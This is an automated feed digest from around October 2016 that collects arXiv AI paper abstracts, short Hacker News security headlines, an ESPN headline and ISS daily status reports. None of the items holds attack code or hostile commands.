This study concerns with the diagnosis of aerospace structure defects by applying a HPC parallel implementation of a novel learning algorithm, named U-BRAIN. The Soft Computing approach allows advanced multi-parameter data processing in composite materials testing. The HPC parallel implementation overcomes the limits due to the great amount of data and the complexity of data processing. Our experimental results illustrate the effectiveness of the U-BRAIN parallel implementation as defect classifier in aerospace structures. The resulting system is implemented on a Linux-based cluster with multi-core architecture.



from cs.AI updates on arXiv.org http://ift.tt/2dlZxYq
via IFTTT

Weighted Positive Binary Decision Diagrams for Exact Probabilistic Inference. (arXiv:1610.05551v1 [cs.AI])

Recent work on weighted model counting has been very successfully applied to the problem of probabilistic inference in Bayesian networks. The probability distribution is encoded into a Boolean normal form and compiled to a target language, in order to represent local structure expressed among conditional probabilities more efficiently. We show that further improvements are possible, by exploiting the knowledge that is lost during the encoding phase and incorporating it into a compiler inspired by Satisfiability Modulo Theories. Constraints among variables are used as a background theory, which allows us to optimize the Shannon decomposition. We propose a new language, called Weighted Positive Binary Decision Diagrams, that reduces the cost of probabilistic inference by using this decomposition variant to induce an arithmetic circuit of reduced size.



from cs.AI updates on arXiv.org http://ift.tt/2dZMREG
via IFTTT

Identifiability and Transportability in Dynamic Causal Networks. (arXiv:1610.05556v1 [cs.AI])

In this paper we propose a causal analog to the purely observational Dynamic Bayesian Networks, which we call Dynamic Causal Networks. We provide a sound and complete algorithm for identification of Dynamic Causal Net- works, namely, for computing the effect of an intervention or experiment, based on passive observations only, whenever possible. We note the existence of two types of confounder variables that affect in substantially different ways the iden- tification procedures, a distinction with no analog in either Dynamic Bayesian Networks or standard causal graphs. We further propose a procedure for the transportability of causal effects in Dynamic Causal Network settings, where the re- sult of causal experiments in a source domain may be used for the identification of causal effects in a target domain.



from cs.AI updates on arXiv.org http://ift.tt/2dlZcoM
via IFTTT

Census Signal Temporal Logic Inference for Multi-Agent Group Behavior Analysis. (arXiv:1610.05612v1 [cs.AI])

In this paper, we define a novel census signal temporal logic (CensusSTL) that focuses on the number of agents in different subsets of a group that complete a certain task specified by the signal temporal logic (STL). CensusSTL consists of an "inner logic" STL formula and an "outer logic" STL formula. We present a new inference algorithm to infer CensusSTL formulae from the trajectory data of a group of agents. We first identify the "inner logic" STL formula and then infer the subgroups based on whether the agents' behaviors satisfy the "inner logic" formula at each time point. We use two different approaches to infer the subgroups based on similarity and complementarity, respectively. The "outer logic" CensusSTL formula is inferred from the census trajectories of different subgroups. We apply the algorithm in analyzing data from a soccer match by inferring the CensusSTL formula for different subgroups of a soccer team.



from cs.AI updates on arXiv.org http://ift.tt/2dZNVZe
via IFTTT

Low-rank and Sparse Soft Targets to Learn Better DNN Acoustic Models. (arXiv:1610.05688v1 [cs.CL])

Conventional deep neural networks (DNN) for speech acoustic modeling rely on Gaussian mixture models (GMM) and hidden Markov model (HMM) to obtain binary class labels as the targets for DNN training. Subword classes in speech recognition systems correspond to context-dependent tied states or senones. The present work addresses some limitations of GMM-HMM senone alignments for DNN training. We hypothesize that the senone probabilities obtained from a DNN trained with binary labels can provide more accurate targets to learn better acoustic models. However, DNN outputs bear inaccuracies which are exhibited as high dimensional unstructured noise, whereas the informative components are structured and low-dimensional. We exploit principle component analysis (PCA) and sparse coding to characterize the senone subspaces. Enhanced probabilities obtained from low-rank and sparse reconstructions are used as soft-targets for DNN acoustic modeling, that also enables training with untranscribed data. Experiments conducted on AMI corpus shows 4.6% relative reduction in word error rate.



from cs.AI updates on arXiv.org http://ift.tt/2dMMAmF
via IFTTT

Design Mining Microbial Fuel Cell Cascades. (arXiv:1610.05716v1 [cs.NE])

Microbial fuel cells (MFCs) perform wastewater treatment and electricity production through the conversion of organic matter using microorganisms. For practical applications, it has been suggested that greater efficiency can be achieved by arranging multiple MFC units into physical stacks in a cascade with feedstock flowing sequentially between units. In this paper, we investigate the use of computational intelligence to physically explore and optimise (potentially) heterogeneous MFC designs in a cascade, i.e. without simulation. Conductive structures are 3-D printed and inserted into the anodic chamber of each MFC unit, augmenting a carbon fibre veil anode and affecting the hydrodynamics, including the feedstock volume and hydraulic retention time, as well as providing unique habitats for microbial colonisation. We show that it is possible to use design mining to identify new conductive inserts that increase both the cascade power output and power density.



from cs.AI updates on arXiv.org http://ift.tt/2dm3pZm
via IFTTT

Deep Amortized Inference for Probabilistic Programs. (arXiv:1610.05735v1 [cs.AI])

Probabilistic programming languages (PPLs) are a powerful modeling tool, able to represent any computable probability distribution. Unfortunately, probabilistic program inference is often intractable, and existing PPLs mostly rely on expensive, approximate sampling-based methods. To alleviate this problem, one could try to learn from past inferences, so that future inferences run faster. This strategy is known as amortized inference; it has recently been applied to Bayesian networks and deep generative models. This paper proposes a system for amortized inference in PPLs. In our system, amortization comes in the form of a parameterized guide program. Guide programs have similar structure to the original program, but can have richer data flow, including neural network components. These networks can be optimized so that the guide approximately samples from the posterior distribution defined by the original program. We present a flexible interface for defining guide programs and a stochastic gradient-based scheme for optimizing guide parameters, as well as some preliminary results on automatically deriving guide programs. We explore in detail the common machine learning pattern in which a 'local' model is specified by 'global' random values and used to generate independent observed data points; this gives rise to amortized local inference supporting global model learning.



from cs.AI updates on arXiv.org http://ift.tt/2dMJVt7
via IFTTT

Fast Sampling for Bayesian Max-Margin Models. (arXiv:1504.07107v5 [stat.ML] UPDATED)

Bayesian max-margin models have shown superiority in various practical applications, such as text categorization, collaborative prediction, social network link prediction and crowdsourcing, and they conjoin the flexibility of Bayesian modeling and predictive strengths of max-margin learning. However, Monte Carlo sampling for these models still remains challenging, especially for applications that involve large-scale datasets. In this paper, we present the stochastic subgradient Hamiltonian Monte Carlo (HMC) methods, which are easy to implement and computationally efficient. We show the approximate detailed balance property of subgradient HMC which reveals a natural and validated generalization of the ordinary HMC. Furthermore, we investigate the variants that use stochastic subsampling and thermostats for better scalability and mixing. Using stochastic subgradient Markov Chain Monte Carlo (MCMC), we efficiently solve the posterior inference task of various Bayesian max-margin models and extensive experimental results demonstrate the effectiveness of our approach.



from cs.AI updates on arXiv.org http://ift.tt/1JMjVYd
via IFTTT

Unsupervised Learning for Physical Interaction through Video Prediction. (arXiv:1605.07157v4 [cs.LG] UPDATED)

A core challenge for an agent learning to interact with the world is to predict how its actions affect objects in its environment. Many existing methods for learning the dynamics of physical interactions require labeled object information. However, to scale real-world interaction learning to a variety of scenes and objects, acquiring labeled data becomes increasingly impractical. To learn about physical object motion without labels, we develop an action-conditioned video prediction model that explicitly models pixel motion, by predicting a distribution over pixel motion from previous frames. Because our model explicitly predicts motion, it is partially invariant to object appearance, enabling it to generalize to previously unseen objects. To explore video prediction for real-world interactive agents, we also introduce a dataset of 59,000 robot interactions involving pushing motions, including a test set with novel objects. In this dataset, accurate prediction of videos conditioned on the robot's future actions amounts to learning a "visual imagination" of different futures based on different courses of action. Our experiments show that our proposed method produces more accurate video predictions both quantitatively and qualitatively, when compared to prior methods.



from cs.AI updates on arXiv.org http://ift.tt/1Ua9BQ7
via IFTTT

Donald Trump's Email Servers are Horribly Insecure — Researcher Reveals

When Hillary Clinton's private email server was hacked earlier this year, she was criticized for her bad security practices that exposed top secret documents stored in emails on that private server. The FBI called her behavior 'extremely careless.' Republican presidential candidate Donald Trump and his supporters are continuously criticizing Clinton's use of a private email server. And here's


from The Hacker News http://ift.tt/2ef0lwB
via IFTTT

Anonymous

Icons tagged with “anonymous”. anonymous. By Gregor Črešnar · Business: Marketing Vol. 4 Collection. PNG Download SVG. Get more help.

from Google Alert - anonymous http://ift.tt/2eeMNRJ
via IFTTT

Facebook is Going to make all your Private Photos Public Tomorrow — It's a Hoax!

Don't believe everything you read on Facebook. Despite so many awareness about Facebook hoaxes, online users fall for them and make them viral. One such viral post is circulating on Facebook that suggests everything that you have ever posted on the social media platform will become public tomorrow. Don't worry — it's a hoax. Yes, it's still a hoax. <!-- adsense --> The latest Facebook


from The Hacker News http://ift.tt/2dl8nFL
via IFTTT

Ravens (3-3) move down 4 spots to No. 18 in Week 7 NFL Power Rankings; visit Jets (1-5) on Sunday (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 10/17/2016

Cygnus Launch Status:  Yesterday’s planned launch of the OA-5 mission was postponed for 24 hours due to an issue with a ground support equipment.  OA-5 launch is set for today, 17-October at 6:40 PM CDT.  This launch attempt will result in OA loitering until after 48S docking, scheduled for Friday 21-October.  OA-5 approach and berthing is planned no earlier than 23-October.  Body Measures: Over the weekend, FE-6 performed the Return minus 15 day (R-15) session for Body Measures with assistance with FE-5.  The crew configured still cameras and video, then collected the Neutral Body Posture video and stow the equipment. NASA is collecting in-flight anthropometric data (body measurements) to assess the impact of physical body shape and size changes on suit sizing. Still and video imagery is captured and a tape measure is used to measure segmental length, height, depth, and circumference data for all body segments (chest, waist, hip, arms, legs, etc.) from astronauts before, during and after their flight missions.  Urine Collections: Over the weekend, the crew continued with collections in support of several Human Research Experiments.  Urine samples were collected, spun in the refrigerated centrifuge and placed in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for the Biochemical Profile, CardioOx, and Repository experiments. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body. The goal of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis risk in astronauts. Twelve crewmembers provide blood and urine samples to assess biomarkers before launch, 15, and 60 after launch, 15 days before returning to Earth, and within days after landing. Ultrasound scans of the carotid and brachial arteries are obtained at the same time points, as well as through 5 years after landing, as an indicator of cardiovascular health. Repository is a storage bank that is used to maintain biological specimens over extended periods of time and under well-controlled conditions. This repository supports scientific discovery that contributes to our fundamental knowledge in the area of human physiological changes and adaptation to a microgravity environment and provides unique opportunities to study longitudinal changes in human physiology spanning many missions. Biological Rhythms 48-Hour Session: Sunday, FE-5 initiated a 48-hour Biological Rhythms session, donning a Holter Monitor and Electrocardiogram (ECG) electrodes.  Today, half-way through the collection period, he changed the Multimedia Card (MMC) and resumed data collection.  Biological Rhythms 48 hours is a Japan Aerospace Exploration Agency (JAXA) experiment that studies the effects of long-term microgravity exposure on heart function by analyzing an astronaut’s electrocardiogram for 48 hours. Electromagnetic Levitation (EML) Configuration: FE-5 continued with configuration of the EML facility today, opening the valve to the Argon (Ar) gas supply and closing the Helium (He) valve.  The crew then changed the magnification factor to standard mode.  The EML is a multi-user facility designed for containerless materials processing in space.  Soyuz (47S) Return Cargo Packing: On Sunday, the crew started packing the cargo that will be returning on 47S. The remaining packing will be completed prior to undocking.  Environmental Health System (EHS) Microbial Air and Surface Sampling: The crew acquired air samples for microbial analysis using the Microbial Air Sampler (MAS) with Petri Dishes and surface samples with slide media. The EHS monitors the atmosphere for gaseous contaminants from nonmetallic materials off-gassing, combustion products, and propellants, microbial contaminants from crewmembers and Station activities, water quality, acoustics, and radiation levels.    Robotics External Leak Locator (RELL) Reposition:  Earlier today the crew extended the Japanese Experiment Module (JEM) Airlock (A/L) slide table and repositioned the RELL in the JEM Orbital Replacement Unit (ORU) Transfer Interface (JODI) so that it is consistent with the configuration required by the Space Station Remote Manipulator System (SSRMS) for successful removal.  The JEM A/L slide table was then retracted back into the A/L. Today’s Planned Activities All activities were complete unless otherwise noted. Calf Measurement Personal CO2 Monitor iPad Application Restart MORZE Food and liquids (medications) intake registration in flight log Biological Rhythms 48 Multi Media Card Exchange EML Gas Valves Opening EML High Speed Camera Lens Switch Samsung tablet charge in Soyuz 731 – charge init Examination of lower extremities veins Skin B Nominal Operations with Downlink Photo/TV JEM Camcorder Swap JEM Airlock Slide Table (ST) Extension to JPM Side Structures and Mechanisms Robo Ext Leak Locator Assist 1 Structures and Mechanisms Robo Ext Leak Locator Reposition Structures and Mechanisms Robo Ext Leak Locator Assist 2 JEM Airlock Slide Table Retraction from JPM Side СОЖ Maintenance Profile of Mood States (POMS) Questionnaire Exercise Equipment Gather ELEKTRON-VM [БЖ] repress Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis SODI External Hard Disk Connect [КАВ] condensate sampling from [СРВ-К2М] upstream ФГС using Russian samplers, Initiate ALGOMETRIA. Experiment Ops In Flight Maintenance (IFM) Urine Processor Assembly (UPA) QD27 Remate MORZE. Food and liquids (medications) intake registration in flight log Samsung tablet charge in Soyuz 731 – charge term Surface Sample Kit (SSK) Collection/Incubation Personal CO2 Monitor Doff Water sampling from БРП-М in Russian bags for beverages MERLIN2 Latch Striker Shim Removal Water sampling from СВО-ЗВ in Russian bags for beverages VEGGIE Facility Sanitization ISS Crew departure preparation Total Organic Carbon Analyzer (TOCA) Sample Data Record ISS HAM Service Module Pass Microbial Air Sampler (MAS) Kit Sample Collection Exercise Data Downlink via OCA MORZE. Experiment setup CCE Preparation VHF Emergency Communication Check Out (US Ground Sites) Crew Choice Event MORZE. Food and liquids (medications) intake registration in flight log Completed Task List Items Crew Departure Prep (FE-5) [Completed Sunday] O2/N2 Adapter Sort [Completed Sunday] 47S Prepack [Completed Sunday] Urine Receptacle (UR) and Insert Filter (IF) Retrieval [Completed Sunday] Ground Activities All activities were completed […]

from ISS On-Orbit Status Report http://ift.tt/2e4AD1j
via IFTTT

ISS Daily Summary Report – 10/14/2016

63 Progress (63P) Undock: 63P undocked successfully from the Service Module (SM) aft port this morning at 4:37 AM CDT. Deorbit burn was completed at 7:50 AM CDT followed by atmospheric entry and destruction.  Vascular Echo Resting Ultrasound: FE-5 performed Vascular Echo resting ultrasound and blood pressure measurements this morning.  With assistance from ground remote guidance teams, he was directed to scan the neck, thigh and heart.  This Canadian Space Agency (CSA) investigation examines changes in blood vessels, and the heart, while the crew members are in space, and then follow their recovery on return to Earth. The results could provide insight into potential countermeasures to help maintain crew member health, and quality of life for everyone. Blood Collections:  FE-6, with assistance from FE-5, performed blood collections in support of several Human Research Experiments.  Samples were collected, spun in the refrigerated centrifuge and placed in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for the Biochemical Profile, CardioOx, and Repository experiments. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body. The goal of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis risk in astronauts. Twelve crewmembers provide blood and urine samples to assess biomarkers before launch, 15, and 60 after launch, 15 days before returning to Earth, and within days after landing. Ultrasound scans of the carotid and brachial arteries are obtained at the same time points, as well as through 5 years after landing, as an indicator of cardiovascular health. Repository is a storage bank that is used to maintain biological specimens over extended periods of time and under well-controlled conditions. This repository supports scientific discovery that contributes to our fundamental knowledge in the area of human physiological changes and adaptation to a microgravity environment and provides unique opportunities to study longitudinal changes in human physiology spanning many missions. Today’s Planned Activities All activities were completed unless otherwise noted. Marrow Breath And Ambient Air Sample Collection – Subject HRF Generic Frozen Blood Collection Double Spin Collection HRF Generic Refrigerated Centrifuge Double Spin Configuration HRF Generic Sample MELFI Insertion Personal CO2 Monitor Doff and Charge Closing Shutters on windows 6, 8, 9, 12, 13, 14 HRF Generic Refrigerated Centrifuge Spin Conclude HRF Generic Sample MELFI Insertion USOS Window Shutter Close Soyuz 731 Samsung Tablet Recharge, Initiate Microbe IV Sampling Sheet and White Tube Collection Ultrasound 2 HRF Rack 1 Power On Vascular Echo Resting Ultrasound Scan 135 Minutes – Subject Preparation and Photography of Progress 432 Docking Assembly from SM Window No.26 during undocking from SM Aft Switch ПрК-ТК PEV to CLOSED position 24-hour ECG Recording (start) Microbe IV Sample MELFI Insertion HRF Generic Frozen Blood Collection Conclude Stow Vascular Echo CDL Holter Arterial BP Measurement – Subject 24-hour Blood Pressure Recording (start) ISS HAM Radio Power Up Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Drain XF305 Camcorder Setup Cell Biology Experiment Facility (CBEF) Micro-G and 1G Wipe Long Duration Sorbent Testbed Status Check. Soyuz 731 Samsung tablet recharging, end Strata Status Check PK-4 data hard drives exchange Robotic Workstation (RWS) Setup Personal CO2 Monitor Donn Robotic Workstation (RWS) High Definition (HD) Monitor Downlink Pre-pack PK-4 Hard Drives for return stowage on Soyuz On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Space Headaches – Weekly Questionnaire PK-4 Video Monitor Deinstallation INTERACTION-2. Experiment Ops MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. Meteor Shutter Open Space Headaches – Weekly Questionnaire Remote Workstation Monitor HD Video Downlink Deactivation RWS. Personal CO2 Monitor Power Cycle Completed Task List Items Cup-PCS-Shell-Swap Ground Activities All activities were completed unless otherwise noted. 63P Undock support Vascular Echo support SSRMS Configuration for Cygnus capture Three-Day Look Ahead: Saturday, 10/15: Weekly Housekeeping, Crew Off Duty Sunday, 10/16: HRF Body Measures, 47S Prepack, Crew Off Duty, OA-5 Launch Monday, 10/17:  SSK and MAS Sampling, Cygnus ROBOT training QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2dYz0OV
via IFTTT

VeraCrypt Audit Reveals Critical Security Flaws — Update Now

After TrueCrypt mysteriously discontinued its service, VeraCrypt became the most popular open source disk encryption software used by activists, journalists, as well as privacy conscious people. First of all, there is no such thing as a perfect, bug-free software. Even the most rigorously tested software, like the ones that operate SCADA Systems, medical devices, and aviation software, have


from The Hacker News http://ift.tt/2edOyyB
via IFTTT

WikiLeaks Confirms Ecuador Cut Julian Assange's Internet Access After Clinton Leak

Early Monday, Whistleblowing site WikiLeaks tweeted that the internet connection of its co-founder, Julian Assange, was intentionally cut down, for which it blamed an unidentified "state party." But most surprisingly, it was Ecuador who was behind the act. WikiLeaks has confirmed that its founder Julian Assange's Internet access was cut down in its London embassy by the government of Ecuador


from The Hacker News http://ift.tt/2dx3g3R
via IFTTT